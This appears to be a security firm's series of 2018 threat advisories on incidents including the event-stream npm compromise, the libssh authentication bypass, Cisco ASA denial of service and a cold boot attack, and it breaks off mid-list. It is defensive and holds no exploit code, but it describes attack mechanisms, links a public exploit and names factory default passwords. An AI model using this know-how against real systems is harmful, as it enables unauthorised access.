Our CTO, Jay Beale, delivered a talk & demos last week on Kubernetes Attack and Defense. You can find the slides, including Youtube links to all demonstration videos and CTF walkthrough at:
https://inguardians.box.com/s/cud8itarxt2u0gh4rec23npvls56kdk1

12/4/2018 Node.js package compromised, Copay targeted

Issue
NPM, the package manager for Node.js, was serving the package “event-stream” with malicious code. The malicious code was placed inside the NPM package on Oct. 5th and went unnoticed until Nov 20th. Event-stream is a dependency for other non-malicious packages, but this malware targeted the Copay application. The malicious code checked the balances of wallets, and if the balance criteria was met, it harvested the account data, and exfiltrated the data/private keys. 

Impact
Impact of this attack is limited to the Copay application, however it highlights the problems inherent trusting dependencies and specifically open source dependencies. This attack was downloaded almost 8 million times, but because it targeted a single application the the impact of the malicious code was limited.

Recommendations
InGuardians recommends that organizations identify if they are utilizing event-stream inside any Node.js applications, specifically version 3.3.6. If the affected version is found, InGuardians recommends reverting to version 3.3.4.

Additional Resources
Details about the event-stream incident
https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident

InGuardians Events & Resources
This friday: Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSA about after-hours shenanigans.
http://hushcon.com/schedule.html

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30
https://www.sans.org/event/stockholm-2018/course/ics-scada-cyber-security-essentials

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6
https://www.blackhat.com/eu-18/training/schedule/index.html#assessing-and-exploiting-control-systems-and-iot-11924

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials

For more events and future training schedule, please visit https://www.inguardians.com/training/

11/27/2018 WordPress AMP Plugin Under Active New Attack, Achieving Remote Code Execution via Stored Cross-Site Scripting
Issue
Bad actors have begun to exploit a privilege escalation vulnerability in the WordPress plugin responsible for rendering Accelerated Mobile Pages (AMP) versions of a WordPress site. The vulnerability permits any registered user to plant JavaScript on any WordPress site that uses the AMP plugin. On many WordPress sites, users can register without approval for an account to make comments on posts.  One of these registered users can place JavaScript on the site using the AJAX functions in the AMP plugin. When an administrator later visits a page with that JavaScript, the attacker gains complete control of the WordPress site, including remote code execution.

Impact
There are over 100,000 active installations of the WordPress AMP plugin.  An active campaign is targeting these sites, granting remote code execution to its organizers and activating the vulnerable WooCommerce WordPress plugin, complicating matters for site owners that upgrade their AMP plugin but don’t realize that they need to upgrade or deactivate a newly-activated WooCommerce plugin. While it’s not yet known what the bad actors plan to do with all of the WordPress servers they’re compromising, it’s likely that those machines will be monetized, using some combination of ransomware, crypto-mining, and the items in Brian Krebs’ article, “The Scrap Value of a Hacked PC.”

Recommendations
InGuardians recommends that organizations determine if they are hosting WordPress sites, then check those sites for the AMP plugin, as well as the WooCommerce plugin.  Organization staff should check to make sure version of AMP plugin is not vulnerable, by making sure that it’s version is 0.9.97.20 or later.

InGuardians also recommends that organizations configure WordPress’ automatic update feature, to ensure that plugins spend as little time vulnerable as possible.

Whenever possible, InGuardians recommends that site owners use WordPress only to author content on a private site that isn’t publicly reachable, publishing a static version of that content on their public web site.  The WordPress plugin “Simply Static” can automate this process.

Finally, InGuardians recommends that organizations review the WordPress Hardening Guide, cited in the Additional Resources below.

Additional Resources
“XSS Injection Campaign Exploits WordPress AMP Plugin” (Wordfence Blog)
https://www.wordfence.com/blog/2018/11/xss-injection-campaign-exploits-wordpress-amp-plugin/

“Active XSS Attacks Targeting Amp for WP WordPress Plugin” (BleepingComputer)
https://www.bleepingcomputer.com/news/security/active-xss-attacks-targeting-amp-for-wp-wordpress-plugin/

“Simply Static [Wordpress plugin]” (Code of Conduct, LLC)
https://wordpress.org/plugins/simply-static/

“Wordpress Hardening Guide” (WordPress.org)
https://codex.wordpress.org/Hardening_WordPress

“The Scrap Value of a Hacked PC” (Krebs on Security)
https://krebsonsecurity.com/2012/10/the-scrap-value-of-a-hacked-pc-revisited/

InGuardians Events & Resources
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSA about after-hours shenanigans.
http://hushcon.com/schedule.html

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30
https://www.sans.org/event/stockholm-2018/course/ics-scada-cyber-security-essentials

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6
https://www.blackhat.com/eu-18/training/schedule/index.html#assessing-and-exploiting-control-systems-and-iot-11924

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials

For more events and future training schedule, please visit https://www.inguardians.com/training/

11/20/2018 Attackers using email forwarding and deleting to steal information, and can hide their tracks.

Issue
A common, yet old, technique attackers use once they’ve gained access to a victim’s email account is to modify the user’s email forwarding settings. These can be forwarded to a temporary email drop-box for remote and untraceable retrieval. Users rarely check their email forwarding settings to see if it has been edited, so the information breach can remain undetected.

Impact
A clear sign of such a breach is fewer emails, or none at all, on an account you expect traffic. That lack of email means the forward and delete is being used.
If an attacker has access to your email account, or the entire email management admin account, they may forward a copy of all future emails to another email account and NOT delete them. This scenario you leak all intellectual property, client information, and other sensitive data without an obvious indication to a normal user. We have seen this in the wild, targeting employee payroll and benefits sites, VPN servers, other corporate assets, and such things as University accounts. The attackers can target employees’ accounts on popular online retailers, to more immediately monetize their access. They may also gain long term business intelligence and intellectual property, getting copies of all attachments as well as simple emails. Organizations involved in research or development are prime targets of such redirection attacks.

Recommendations
Check your email account configuration for odd forward or delete-upon-receipt modifications. There are methods for receiving alerts when your email account configuration changes, so use them. Look for forwards to odd domains, such as “nada<dot>email” (that’s a real example). There are others. These names and their associated IP addresses (IPv4 and v6) should be part of your outbound firewall filters. There is no reason your company should be connecting to such places. A Google search for “nada email” will show you that particular solution and many others. Deny organizational traffic to such places and make sure the firewall sends an alert. That your email is trying to go there is proof of unauthorized alteration of email settings, whether from an external attack or an insider.

Additional Resources
“PowerShell and Malicious O365 Email Rules“ (Crypsis Blog)
https://www.crypsisgroup.com/blog/powershell-malicious-o365-email-rules/

“Found a forwarding rule in CEO’s account. Need advice.” (Spiceworks User Forum)
https://community.spiceworks.com/topic/2099649-found-a-forwarding-rule-in-ceo-s-account-need-advice

“Don’t be a Whale – How To Detect the Business Email Compromise (BEC) Scam” (Tripwire
https://www.tripwire.com/state-of-security/featured/how-detect-business-email-compromise-bec-scam/

“When Phishing Succeeds: The Alternate Inbox Method” (Avanan Blog)
https://www.avanan.com/resources/phishing-alternate-inbox

GetNada – an example of a simple external email dropbox
https://getnada.com

InGuardians Events & Resources
Jarrod Frates, InGuardians Senior Security Analyst returns to Brakeing Down Security podcast to continue his discussion about all things pentest. If your organization is engaging in a pentest, give this a listen.
Part 1: http://brakeingsecurity.com/2016-029-jarrod-frates-steps-when-scheduling-a-pentest-and-the-questions-you-forgot-to-ask
Part 2: http://brakeingsecurity.com/2018-040-jarrod-frates-discusses-pentest-processes

Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSA about after-hours shenanigans.
http://hushcon.com/schedule.html

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:
ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30
https://www.sans.org/event/stockholm-2018/course/ics-scada-cyber-security-essentials

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6
https://www.blackhat.com/eu-18/training/schedule/index.html#assessing-and-exploiting-control-systems-and-iot-11924

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials

For more events and future training schedule, please visit https://www.inguardians.com/training/

11/14/2018 Tomorrow’s cybersecurity threat

Issue

Over the weeks we have discussed breaking news about security flaws and exploits. Those have all been after a breach or attack was discovered. Tomorrow’s exploits will be both evolutionary and revolutionary.
We will continue to see re-use of old concepts like SQL injection, bad error trapping, or flaws in embedded application code. We have seen those all for years, and they remain in the top vulnerabilities in every list. Two weeks ago researchers discovered a way to modify things like Youtube video links embedded in Word documents that enable running malware without triggering a User Access Control window. Just a month ago, Fancy Bear malware was found in the wild capable of “patching” and tampering with firmware in targeted attacks.

Impact
InGuardians recommends you take a step back and consider your internal training and job announcement processes. Many organizations aim to hire people who already know Application X, or announce openings for people who know “Y”. ANY particular program in use today WILL be superseded, and new devices are deployed faster than we realize they are on our networks.  Dr. Weber at the Center for Long Term Cybersecurity, UC Berkeley, uses the rapid growth of internet connected locks as an example of how our concepts and policies are not keeping up. “The notion that there’s this thing called “cybersecurity” that’s distinct from this other thing called “security” — that’s an idea that is disappearing,” Weber said.

Recommendations
InGuardians recommends considering security as the broader guiding concept. Too often “cyber” is separate and in an IT department. Experience reveals that company risks often start in Sales or Marketing Departments, or phishing attacks from email. It is common to be able to pivot from a user machine, discovering and then penetrating Domain Controllers.

Re-examine network architecture to avoid risk of simply walking back to controllers and servers. Segmentation is still a useful strategy even in an era of externally web hosted services.

Many companies like to hire experienced cyber security staff, but where do people get experience? Consider both internal training and partnering with academia for the practical skills really needed. There is now and will be for a long time a major shortage of effective security practitioners. Since that suggests difficulty in hiring them, try training your own. As Weber says, it is also important to look at people already skilled in such things as accounting or healthcare. REAL cybersecurity is a multidisciplinary and context sensitive effort.

Additional Resources
The Ten Most Critical Web Application Security Risks
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

Unpatched MS Word Flaw Could Allow Hackers to Infect Your Computer
https://thehackernews.com/2018/10/microsoft-office-online-video.html

Tomorrow’s cyber threats demand a new kind of cybersecurity workforce
https://qz.com/1342324/tomorrows-cyber-threats-demand-a-new-kind-of-cybersecurity-workforce/

Global Cybersecurity Workforce Shortage to Reach 1.8 Million as Threats Loom Larger and Stakes Rise Higher
https://www.isc2.org/News-and-Events/Press-Room/Posts/2017/06/07/2017-06-07-Workforce-Shortage

The Damaging Effects of IP Theft
https://cybersecurity.berkeley.edu/blog/damaging-effects-ip-theft/

Fancy Bear LoJax campaign reveals first documented use of UEFI rootkit in the wild
https://www.zdnet.com/article/fancy-bear-lojax-campaign-reveals-first-documented-use-of-uefi-rootkit-in-the-wild/

The Center for Long-Term Cybersecurity, UC Berkeley
https://cltc.berkeley.edu/

InGuardians Resources & Events
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members and say hi!

http://hushcon.com/schedule.html

We are happy to announce that David Mayer, Senior Security Consultant, will be leading  a SANS Institute mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

11/6/2018 Zero-day Denial of Service flaw in Cisco ASA and FTD appliances

Issue
Cisco has issued a security advisory describing a denial of service condition in both its flagship Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD).  The flaw is in the Session Initiation Protocol (SIP) inspection engine of ASA versions 9.4+ and FTD versions 6.0+. An attacker can use this to crash these appliances. These are remotely executed denial of service (DoS) attacks, and instances of use have already been seen in the wild.  The flaw is described in National Vulnerability Database (NVD) under the entry CVE-2018-15454.

Impact
InGuardians rates this vulnerability as High impact. As of the end of last week, InGuardians and several other organizations have identified these attacks in the wild.  Cisco ASA and FTD appliances are widely deployed, and there are no patches available at the time of this writing.

Recommendations

InGuardians recommends that all clients running ASA or FTD appliances identify whether the appliances are vulnerable and apply Cisco’s mitigation advice poste haste.  As noted, attacks have been seen in the wild, and have already caused outages at several organizations.

In the first link in our Additional Resources, Cisco has released the following potential mitigations:

-Disabling SIP inspection
-Filtering on sent-by-address of 0.0.0.0
-Rate limiting SIP traffic
-Blocking offending hosts

In addition, Cisco released information to help identify, through log analysis, whether or not your appliances have been affected by the DoS attacks.  To hunt for active exploitation of this flaw, staff can run the following two commands.

This command will show a large number of incomplete SIP connections:

show conn port 5060

This will show a high CPU utilization:

show processes cpu-usage non-zero sorted

If the appliance has been attacked successfully, it will crash and reload.  This indicator will also show up as an unknown abort of the DATAPATH thread in the output of the following command:

show crashinfo as

Additional Resources

Cisco Adaptive Security Appliance Software and Cisco Firepower Threat Defense Software Denial of Service Vulnerability (Cisco)

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181031-asaftd-sip-dos

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd

Cisco ASA and FTD SIP Inspection denial-of-service vulnerability (CERT)

https://www.kb.cert.org/vuls/id/339704/

Cisco zero-day exploited in the wild to crash and reload devices (ZDNET)

https://www.zdnet.com/article/cisco-zero-day-exploited-in-the-wild-to-crash-and-reload-devices/

InGuardians Resources and Events

On Thursday, the webinar “Kubernetes Hacking and Hardening Episode 2: Bust a Kube” goes live, presented by InGuardians CTO Jay Beale.  Come learn how to hack and defend Kubernetes, containers, and cloud native environments!

Nov 8, 2018 | 10AM PST / 1PM EST
https://www.beyondtrust.com/resources/webinar/kubernetes-hacking-hardening-episode-2-bust-kube/?utm_campaign=ContentMktg&utm_content=webinar&utm_medium=Social&utm_source=tw

Awesome article about vulnerabilities that often get ignored by many security departments. Tyler Robinson shares his experience and provides you with helpful tips on how to minimize the risk of a cyber attack on non-computer vectors
https://www.darkreading.com/vulnerabilities—threats/7-non-computer-hacks-that-should-never-happen/d/d-id/1333194

Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members and say hi!

http://hushcon.com/schedule.html

We are happy to announce that David Mayer, our Senior Security Consultant will hold a mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

10/30/2018 Windows ‘Deletebug’ Zero-Day allows privilege escalation, data destruction.

Issue
A proof-of-concept exploit for a Windows zero-day vulnerability has been released that allows an attacker to delete any kind of file on a victim machine, including those containing data vital to the system. The exploit works on fully-patched Windows 10 machines. The vulnerability is in Microsoft’s Data Sharing Service (dssvc.dll). This is a local service that runs as a LocalSystem account with extensive privileges, and enables data to be brokered between applications.

Mitja Kolsek, describing the vulnerability to Threatpost, said, “Even a low-privileged user can make a request to this service for an undocumented function (only Microsoft and possibly a few outsiders know what this function does), and this function checks whether the requesting user has permissions to create a file in a chosen location,”
If a user does not have permission to write the file, it deletes it.

Impact
The problem is the service stops impersonating the user and runs the last step with system privileges, giving the user the ability to delete arbitrary files on the system, whether log files or files they might seek to replace. For example, an attacker may escalate privileges more fully if they could delete the dynamically loaded library (DLL) file from a privileged program, if that program would search for its missing DLL file in a directory to which the attacker can write.

However, as the discoverer SandboxEscaper tweeted. “Here’s a low quality bug that is a pain to exploit…” If SandboxEscaper’s opinion is correct, it is unlikely that there will be immediate wide-reaching uses of the vulnerability. This is in part because an attacker already needs system access or needs to chain this with a remote exploit.  With that said, attackers and even automated worm/bot programs chain exploits. InGuardians takes this vulnerability seriously, as does Microsoft, whose Security Response unit notes that the vulnerability is in scope for its Bug Bounty program.

Recommendations
Recognize that this vulnerability is for NEW versions of Windows, Windows 10, Server 2016 and 2019. Checking event logs and network logs for any unauthorized access should already be part of IT security efforts. Add to it looking for “impersonation” events as shown in 0patch’s description.

It is also important to realize that any service running as system may be susceptible to similar flaws or exploits that are as yet unknown. Network access visibility is a critical part of recognizing potential unauthorized intrusions.

Additional Resources
Windows ‘Deletebug’ Zero-Day Allows Privilege Escalation, Destruction
https://threatpost.com/windows-deletebug-zero-day-allows-privilege-escalation-destruction/138550/

Microsoft Data Sharing Service
https://social.technet.microsoft.com/Forums/en-US/0cee780c-c55d-4a3a-bfe2-223a78206b1a/data-sharing-service?forum=win10itprosecurity

Sandbox Escaper’s tweet
https://twitter.com/SandboxEscaper/status/1054744201244692485

Kolsek’s tweet, 0Patch’s co-Founder, confirming the zero-day vulnerability
https://twitter.com/mkolsek/status/1054780894785998848

Tweet from 0Patch, regarding micro-patching the vulnerability
https://twitter.com/0patch/status/1054859940945387520/photo/1

Microsoft Security Response Tweet regarding bug bounty
https://twitter.com/msftsecresponse/status/1055156542280884224?s=19

InGuardians Events and Resources
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung fu on Dec 7 at 2PM. We will be hanging out after the conference as well, come say hi!

http://hushcon.com/schedule.html

We are happy to announce that David Mayer, our Senior Security Consultant will hold a mentor session on  “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

10/22/2018 Libssh authentication bypass leaves devices vulnerable to unauthenticated shell access.

Issue
A critical authentication bypass bug in libssh versions after 0.6 has been identified. Libssh is a library implementation of the SSH version 2 protocol for the C programing language, able run on multiple platforms as both a server and a client. The actual vulnerability itself is exploited  by sending a SSH2_MSG_USERAUTH_SUCCESS message to the server, which in turn presents a shell to the unauthenticated user, giving them access to the end point. The code for the exploit is a mere 27 lines of code and is currently publicly available. Fortunately, fingerprints for the affected services are also publicly available to allow organizations to scan for exploitable end points. So far, the biggest vendor to publicly disclose that they are affected by this issue is F5 networks, with their BIG-IP Advanced Firewall Manager (AFM) product, versions 12 or newer, vulnerable to the exploit.

Impact
While the full impact of this issue is still being analyzed, the majority of publicly discovered vulnerable devices, outside of the F5 Big-IP AFM, are SFTP servers, routers, printers, modems, and Internet of Things (IoT) devices. While the libssh library is not the most popular choice for implementing SSHv2, it is used in a wide variety of devices that could be embedded in any network. Libssh is a relatively new library and as such only devices purchased or updated after 2014 are likely to be affected.

Recommendations
InGuardians recommends that organizations scan their networks for vulnerable libssh versions and either manually update libssh or, if that is not possible, restrict access to the affected interfaces and work with their software/device vendors to resolve the issue. The additional recommendations below include a Python program to scan networks for this vulnerability.

Note that this serious vulnerability was created in an apparent attempt to update a code library. Remember: as code ages, updates to patch make sense, but things are NOT always better merely because they are newer. Test and evaluate BEFORE deploying new code.

Additional Resources
F5 Vulnerability Advisory “K52868493: libssh vulnerability CVE-2018-10933” (F5) https://support.f5.com/csp/article/K52868493
“CVE-2018-10933 – libssh’s server-side state machine“ (F5 Customer Post)
https://devcentral.f5.com/questions/cve-2018-10933-libsshs-server-side-state-machine-62170

“CVE-2018-10933 Detail” (NIST)
https://nvd.nist.gov/vuln/detail/CVE-2018-10933

CVE-2018-10933 Vulnerability Scanner (Leap Security)
https://github.com/leapsecurity/libssh-scanner

Proof of Concept Exploit (GitHub user kn6869610)
https://github.com/kn6869610/CVE-2018-10933

InGuardians Events and Resources

If you are at Wild West Hacking Fest this Friday, watch InGuardians’ Suzanne Pereira and Larry Pesce’s talk, “What to Expect When You are Expecting … A Penetration Test”

https://wwhf18.sched.com/event/FoAc/what-to-expect-when-you-are-expectinga-penetration-test

10/17/2018 California Bill SB-327 Highlights IoT’s Weak Password Security Practices

Issue

The “Internet of Things” (IoT) has massively increased the number of Internet-connected devices which can be hacked by anyone with access to those devices’ well-known passwords. The state of California, with the fifth largest economy in the world, has passed a law that will require all devices in the state to either have unique initial passwords or to have a feature allowing owners to set up a method of authentication before first connecting to the device. This law takes effect on the first day of 2020.

Impact

By 2020, makers of Internet-connected devices will be banned from selling devices that have per-product initial passwords. While the presence of default or trivial (eg, “admin/admin”) credentials might seem almost laughable in the year 2018, unfortunately that is not the case.  The Mirai botnet used both default and trivial credentials to compromise more than 600,000 IoT devices in 2016. Using these devices, it sent some of the largest recorded distributed denial of service (DDoS) attacks, in excess of 1.1 terabits per second. The Graham Cluley article referenced below lists the 60 hard coded passwords, including common manufacturer-set initial passwords, like “admin,” “00000000,” and “Zte521.” This problem isn’t confined to IoT devices, either.  Last month, Cisco corrected its use of a static root password for all deployed Cisco Video Surveillance Manager devices in two of the last three released.

Recommendations

InGuardians recommends that every organization check its own devices for trivially weak authentication, whether that entails static, simple, shared passwords (e.g., found in device manuals) or a lack of authentication. While not guaranteed to be comprehensive, a vulnerability scanner like Tenable’s Nessus, Bomgar’s Retina, or the open source OpenVAS, can be particularly helpful, as these tools check for a number of default credentials.

InGuardians recommends that product vendors take the following additional steps to avoid this type of problem:

  • Conduct internal or third party security product reviews to discover these issues well before the first release of a product, as well as before any major update to a product.
  • Review existing manuals and product penetration testing results to determine if password security practices meet best practice and California Bill SB-327.
  • Share California Bill SB-327 with in-house counsel and compliance officers.

InGuardians recommends that product customers take the following additional steps to avoid this type of problem:

  • Conduct regular vulnerability scanning as a component of a process-oriented security program
  • Build and maintain an inventory of all network-connected devices, including IoT and BYOD.
  • Confirm that all administrative passwords for all devices are unique, strong, differ from vendor defaults, and are maintained in a separate, secure password management system.
  • Place IoT and BYOD devices on separate network/VLAN’s, monitored and segmented from each other, from the internal network, and from wide-ranging Internet access.

Additional Resources

California Senate Bill SB-327 (California Legislature)
https://leginfo.legislature.ca.gov/faces/billNavClient.xhtml?bill_id=201720180SB327

Cisco Video Surveillance Manager Appliance Default Password Vulnerability (Cisco Security)
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180921-vsm

These 60 dumb passwords can hijack over 500,000 IoT devices into the Mirai botnet (Graham Cluley)
https://www.grahamcluley.com/mirai-botnet-password/

InGuardians Resources and Events

Online this Thursday, you can learn from InGuardians CTO Jay Beale, as he demonstrates attack and defense on a Linux Capture-the-Flag machine.

https://www.beyondtrust.com/resources/webinar/attacking-defending-linux-ctf/

If you are at Wild West Hacking Fest next Friday, watch out for InGuardians’ Suzanne Pereira and Larry Pesce’s talk, “What to Expect When You are Expecting … A Penetration Test”

https://wwhf18.sched.com/event/FoAc/what-to-expect-when-you-are-expectinga-penetration-test

10/11/2018 Web App Penetration Testing without Threat Hunting May Leave Indicators of Compromise Undetected

Issue
Many web applications that are available from the Internet handle very sensitive information governed under various compliance initiatives such as HIPAA, PCI, GDPR, etc.  Understanding how that information is protected within the application is just as important as understanding the attack surface of the application.  If a threat actor has gained unauthorized access to a web application and its associated data via a particular vector of vulnerability, they will correct the vulnerability immediately, to keep other threat actors out.  Even automated threat actors historically perform this action.  For example, in April of 2017, the Adylkuzz malware used the same ETERNALBLUE exploit that WannaCry would use a month later in May.  WannaCry was unable to infect the quarter million Adylkuzz victims, because Adylkuzz hardened the systems it compromised (by deactivating SMB).   Because attackers so often remove the vulnerabilities they used to compromise systems and networks, a penetration test alone may not demonstrate the full security posture of a web application and the sensitive data housed within.

Impact
In cases where penetration tests are performed without subsequent auditing of the system for embedded threat actors, years may pass before an enterprise learns about a compromise and a threat actor’s presence in its system.  The organization may be violating regulations that govern sensitive data or, even worse, exposing itself to downstream liability issues should the threat actor steal or modify data or conduct fraudulent activity.

Likewise, if proper security controls are not in place to protect the data from a threat actor who has gained access to the application server, then the internal security posture of the application is weak and exposes the organization to risk.

Recommendations
Whenever it is appropriate for a penetration test to be performed on a web application, ensure that two other tasks are also performed.  First, threat hunting on the operating systems in which the application and its data reside, and a development of a clear understanding of data flows, encryption, and other internal controls that should protect the data in the case of a compromise.

Additional Resources
“Getting Ahead of The Adversary – Splunk and Johns Hopkins Demonstrate Threat Hunting Tactics” (Splunk)
https://www.splunk.com/en_us/form/splunk-and-johns-hopkins-demonstrate-threat-hunting-tactics.html

“How to Become a Master Threat Hunter” (Carbon Black)
https://www.carbonblack.com/2017/07/17/become-master-threat-hunter/

Blue Team Services (InGuardians)
https://www.inguardians.com/blue/

InGuardians Events and Resources
A huge thank you to everyone that came by the booth and caught up with us at Derbycon!   A special shout goes out to Annah W. for winning our Derbycon raffle.

If you are at Wild West Hacking Fest, be sure to catch Suzanne Pereira and Larry Pesce’s presentation “What to expect when you’re expecting… a pentest”.  Two of our directors join forces to discuss how you should prepare and operate during a penetration test.

10/2/2018 Which of your secrets do cloud services see?

Issue
Which of your secrets are upload to cloud services, without your explicit instruction? Consider these cases: a Microsoft Word document about an upcoming merger or executive changeover gets infected with malware, triggering its upload to the anti-virus vendor’s cloud service. Or a software crash on a laptop causes an upload of logs and memory dumps, which contain encryption keys, passwords, and confidential files. Or an anti-virus triggers on a ZIP file, uploading the company’s most sensitive financial data to a service. It’s nearly impossible to affirmatively control this data once uploaded. While cloud-based services can bring enormous benefit in cutting off attacks before many ever see them, they rely mostly on automated guesses about files that may grab sensitive information.

Modern security products often look far different from their predecessors from a mere decade ago. In addition to basic functions of blocking unwanted network traffic, anti-virus programs, web proxies, firewalls, VPNs, and even operating systems send various information to cloud-based services. The products’ vendors do this to collect intelligence about malicious activity, crashes, and use patterns to help them understand and react to their customers’ environments.

Security vendors monitor the provided data in real time, reducing many of their customers’ reaction time to potential threats from days to minutes, often automating most of the process. The data have done much to limit opportunities for attackers to obtain unauthorized access or to damage networks after first detection.

However, it’s very easy for proprietary data to get caught up in this. In 2014, software from Kaspersky Labs uploaded suspicious files from a home computer in Maryland. These turned out to be highly classified tools from the National Security Agency’s Tailored Access Operations group, copied by an employee from his work computer to his personal computer. Once the NSA’s tools were compromised, there was no way of reversing this, and the NSA had to halt usage of those tools, likely at significant cost.

The same holds true for anyone using cloud-tied security services. Content from the sites you visit, the files you open, and the software you run may all find its way to a cloud-based vendor. Most will ignore the irrelevant details, but some may parse contents, and some may even sell aggregate or detailed information.

Of course, this problem isn’t confined to security software. Other vendors have used crash data to identify common faults and help developers fix crashes. Photos are automatically uploaded to Apple’s iCloud or Google Photos. Google Sync may automatically back up documents, and cloud storage providers like Box, Dropbox, and Microsoft OneDrive can be configured similarly. Note that any of these services might be configured to use a personal account, rather than one controlled by your organization.

Impact
The vast majority of cloud-based security companies take security very seriously and only a tiny fraction of uploaded files are held for very long. Even fewer receive close scrutiny. However, the need to manually
review some submissions means that there is always someone who can see them in their raw state. At that point, the uploading entity has essentially lost all control of the uploaded data. The data is subject to subpoena or warrants, misuse such as insider trading, or theft or leaking by malicious actors.

Avoiding this is possible, but not always easy. The most sensitive files might be managed on “air-gapped” systems (i.e., never connected to a network). Working with air-gapped systems limits productivity, but, when properly done, also creates some of the most secure conditions possible.

Recommendations
InGuardians recommends that companies determine which software running on their systems uploads data to cloud services, what data could be uploaded, and how that data is handled once in the vendor’s hands. Companies can start by investigating Terms of Service, End User License Agreements, and applicable laws and regulations. The next step involves using or establishing vendor security questionnaires, whether custom or from one of the three most popular standards: VSAQ, CAIQ, and SIG/SIG-Lite.

Even strong promises should be approached with caution. Appropriate safeguards for the most sensitive data should be in place using a combination of policy and technology to reduce the risk of inadvertent loss of control. This not only limits the ability of cloud services to gain unexpected access, but also limits dissemination among internal personnel who do not have a need to know.

Additional Resources
Vendor Security Assessment Questionnaire (Google)
https://opensource.google.com/projects/vsaq

Consensus Assessments Working Group (Cloud Security Alliance)
https://cloudsecurityalliance.org/group/consensus-assessments/#_overview

Standardized Information Gathering Questionnaire (SFG Shared Assessments)
https://sharedassessments.org/sig/

Kaspersky: Yes, we obtained NSA secrets. No, we didn’t help steal them (Nov 16, 2017)
https://arstechnica.com/information-technology/2017/11/kaspersky-yes-we-obtained-nsa-secrets-no-we-didnt-help-steal-them/

Dropbox takes a peek at files. But it’s totally nothing, says Dropbox. (Sep 13, 2013)
https://www.pcworld.com/article/2048680/dropbox-takes-a-peek-at-files.html

How artificial intelligence stopped an Emotet outbreak (Feb 14, 2018)
https://cloudblogs.microsoft.com/microsoftsecure/2018/02/14/how-artificial-intelligence-stopped-an-emotet-outbreak/

InGuardians Resources and Events
Derbycon: If you are at Derbycon this week, stop by InGuardians booth.  Many of our operators will be there demonstrating tools, as well as teaching skills ranging from lock picking to RFID hacking.
09/17/2018 A new Cold Boot attack puts data on full-disk encrypted computers at risk again

Issue
Revisiting the Cold Boot attack, researchers from F-Secure were able to circumvent current protections, gaining access to data on computers even when Full Disk Encryption (FDE) was enabled.

In the original Cold Boot attack, a bad actor boots the computer from a powered-off state. Booting the target system from removable media (such as a USB thumb drive), the attacker uses memory harvesting tools to recover the contents of RAM from the previous boot.  Most importantly, the attacker gains the decryption keys for the computer’s encrypted drive.

After the publication of the original Cold Boot attack methodology, hardware manufacturers instituted methods for protecting the RAM storing the full disk encryption (FDE) keys.  In the most common protection method, specified by the Trusted Computing Group, the computer overwrites the RAM storing those keys at the time of boot.  Unfortunately, this overwrite only occurs when the Memory Overwrite Request (MOR) bit is set in non-volatile memory.

F-Secure’s researchers found that they were able to modify the BIOS system configuration to flip the MOR bit back to zero, disabling the boot-time FDE key RAM overwrites, allowing themselves to use the original Cold Boot attacks to access the full disk encryption keys, and thus the computer’s drive contents.

Impact
With a successful re-implementation of the Cold Boot attack using the updated methodology, it is possible for an attacker to gain access to all of the data stored on a computer, even when FDE is enabled. Should the system contain sensitive information, the attacker can gain full access to the data. The attacker also gains the ability to compromise the computer.

There are some hurdles to overcome for an attacker attempting to deliver the updated Cold Boot attack. The attacker must have:

Unrestricted physical access to the computer under attack
Knowledge and experience delivering the first generation Cold Boot attack
